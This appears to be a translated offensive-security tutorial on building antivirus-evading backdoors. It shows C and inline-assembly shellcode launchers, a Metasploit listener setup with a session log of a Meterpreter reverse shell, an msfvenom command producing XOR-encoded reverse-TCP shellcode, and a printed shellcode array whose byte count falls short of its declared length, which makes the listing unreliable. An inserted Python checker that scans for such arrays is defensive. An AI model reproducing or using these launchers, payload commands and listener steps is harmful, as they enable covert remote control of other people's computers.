
Payload: Separating the Backdoor for AV Evasion (2)

Published: 2021-03-06 05:04. Source: compiled from the web.

Besides the assembly form shown above, I have also collected a few other ways of invoking the shellcode.

// All four variants jump into `shellcode`, the byte array declared earlier in the article.
// The __asm blocks are MSVC inline assembly and only build in a 32-bit (x86) configuration.

// Method 1: cast the buffer address to a function pointer and call it
void RunShellCode_2()
{
    ((void(*)(void))&shellcode)();
}

// Method 2: load the buffer address with lea and jump to it
void RunShellCode_3()
{
    __asm
    {
        lea eax, shellcode;
        jmp eax;
    }
}

// Method 3: same as method 2, but loads the address via offset
void RunShellCode_4()
{
    __asm
    {
        mov eax, offset shellcode;
        jmp eax;
    }
}

// Method 4: _emit writes the two raw bytes FF E0, the machine code for jmp eax
void RunShellCode_5()
{
    __asm
    {
        mov eax, offset shellcode;
        _emit 0xFF;
        _emit 0xE0;
    }
}

3. On the MSF control host, start the listener.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888

Run our shellcode program and a reverse shell comes back.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888
[*] Sending stage (179779 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805)

meterpreter > sysinfo
Computer        : lyshark
OS              : Windows 10 (Build 19999).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

Compiling the backdoor with C#

The C# compiler on Windows is csc.exe. If your .NET Framework SDK is installed on drive C, you can find the compiler under C:\Windows\Microsoft.NET\Framework64. For convenience, you can add that directory to the Path environment variable manually.

1. Use MSF to generate the backdoor shellcode and save it to lyshark.txt.

msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid \
    LHOST=192.168.1.30 LPORT=8080 -b '\x00' \
    -e x64/xor -i 10 -f csharp \
    -o ./lyshark.txt

The generated shellcode looks like this:

cat lyshark.txt
byte[] buf = new byte[951] {
0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0x8d,0x05,0xef,0xbb,0xa9,0x1e,0xb2,0x97,0xb9,0xdc,0x04,0x58,0x27,0x2d,0xf8,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,0x4f,0xfb,0xfa,0x93,0x92,0x23,0x09,0x0c,0xb8,0xa5,0xb6,0x2c,0x64,0xbd,0xa6,0x4c,0x84,0xe6,0x4d,0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x79,0xf9,0x46,0xfd,0x3c,0xce,0x0a,0x9a,0x03,0xc7,0x18,0x47,0x90,0xc3,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x14,0x99,0x7d,0xbf,0xdf,0x38,0x12,0x08,0x2b,0x42,0xbc,0x98,0x2a,0xf3,0xaf,0x1f,0x67,0xf1,0x35,0x9f,0xd0,0x3f,0x13,0xa2,0xf5,0x88,0xe0,0x26,0xaa,0xb0,0x02,0xa4,0xe5,0x63,0xb1,0x8c,0x75,0xd5,0x06,0xb4,0x30,0x73,0x29,0x80,0xe3,0x0f,0x19,0xd4,0xc4,0x62,0x45,0x1a,0x22,0x5f,0x91,0x0b,0x6d,0x76,0x59,0xe8,0x8a,0xa8,0x8b,0x70,0x5a,0xd8,0xb3,0x82,0xb5,0x86,0x21,0xee,0x3a,0x3d,0xda,0xf2,0x2e,0x6a,0x54,0x5c,0x51,0x36,0xd9,0x43,0xad,0x89,0x3e,0x1c,0x95,0x0d,0x10,0x96,0xc1,0x49,0xed,0xba,0x32,0x52,0x94,0xd7,0xcf,0x65,0x24,0x85,0xab,0x69,0xfc,0xd3,0xdb,0x66,0x44,0x61,0xa1,0xa7,0x20,0xd6,0x7f,0x60,0xeb,0xcd,0x57,0xe7,0x8f,0x1d,0x39,0x6c,0x6e,0xcb,0x17,0x9c,0x9e,0x0e,0xd2,0xa0,0xde,0xd1,0xae,0xf6,0xac,0x07,0xbe,0x11,0xec,0xa3,0x72,0x33,0x87,0xc6,0x40,0x74,0x01,0xea,0x77,0x55,0xc2,0x7c,0x41,0x15,0xc0,0x6f,0x04 };
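An added, defensive example (not part of the original article): a small Python checker that parses the C# array literal `msfvenom -f csharp` emits, so that source trees or build inputs can be scanned for embedded encoded blobs. It reports whether the declared length matches the number of bytes actually listed (a mismatch is what a truncated copy like the listing above looks like), whether any of the bad characters the generator was told to avoid are present, and the Shannon entropy of the bytes, since the `-e x64/xor -i 10` encoding step leaves a blob that is close to random. The two samples, the regex, the entropy threshold and the function names are all my own constructions.

```python
import math
import re

# Regex for the array literal msfvenom -f csharp emits:
#   byte[] buf = new byte[951] { 0x48,0x31,... };
_CSHARP_BUF_RE = re.compile(
    r"byte\[\]\s+(?P<name>\w+)\s*=\s*new\s+byte\[(?P<declared>\d+)\]\s*\{(?P<body>.*?)\}",
    re.DOTALL,
)

# Constructed sample: the declaration from the listing above cut to its first 16 bytes,
# with the declared length left at 951, which is exactly what a truncated copy looks like.
SAMPLE_TRUNCATED = """byte[] buf = new byte[951] {
0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0x8d,0x05,0xef,0xbb,0xa9,0x1e,0xb2,0x97 };"""

# Constructed sample with a consistent length but containing a null byte,
# the bad character the msfvenom command above excludes with -b '\x00'.
SAMPLE_WITH_NULL = "byte[] buf = new byte[4] { 0x00, 0x90, 0x90, 0xc3 };"


def parse_csharp_buf(source):
    """Return (name, declared_length, bytes) for the first array literal found, or None."""
    m = _CSHARP_BUF_RE.search(source)
    if m is None:
        return None
    tokens = re.findall(r"0x([0-9a-fA-F]{1,2})", m.group("body"))
    return m.group("name"), int(m.group("declared")), bytes(int(t, 16) for t in tokens)


def shannon_entropy(data):
    """Bits of entropy per byte; 8.0 is the maximum, reached by uniformly random bytes."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def assess_csharp_buf(source, bad_chars=b"\x00", entropy_threshold=6.5, min_len=64):
    """Summarise the embedded array. The threshold and minimum length are heuristic
    assumptions: short arrays cannot reach high entropy, so they are never flagged."""
    parsed = parse_csharp_buf(source)
    if parsed is None:
        return None
    name, declared, data = parsed
    entropy = shannon_entropy(data)
    return {
        "name": name,
        "declared_len": declared,
        "actual_len": len(data),
        "length_matches": declared == len(data),
        "bad_chars_present": any(b in data for b in bad_chars),
        "entropy": round(entropy, 3),
        "high_entropy_blob": len(data) >= min_len and entropy > entropy_threshold,
    }


if __name__ == "__main__":
    for sample in (SAMPLE_TRUNCATED, SAMPLE_WITH_NULL):
        print(assess_csharp_buf(sample))
```

Running it on a full 951-byte output rather than the truncated sample is where the entropy flag becomes useful; on the samples above the report only shows the length mismatch and the null byte. Declared-versus-actual length is worth checking in its own right, because a C# compiler will reject an initializer whose element count differs from the declared size, so a mismatch means the artifact was edited or cut, not that it came straight from the generator.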

Compiling the backdoor with Python
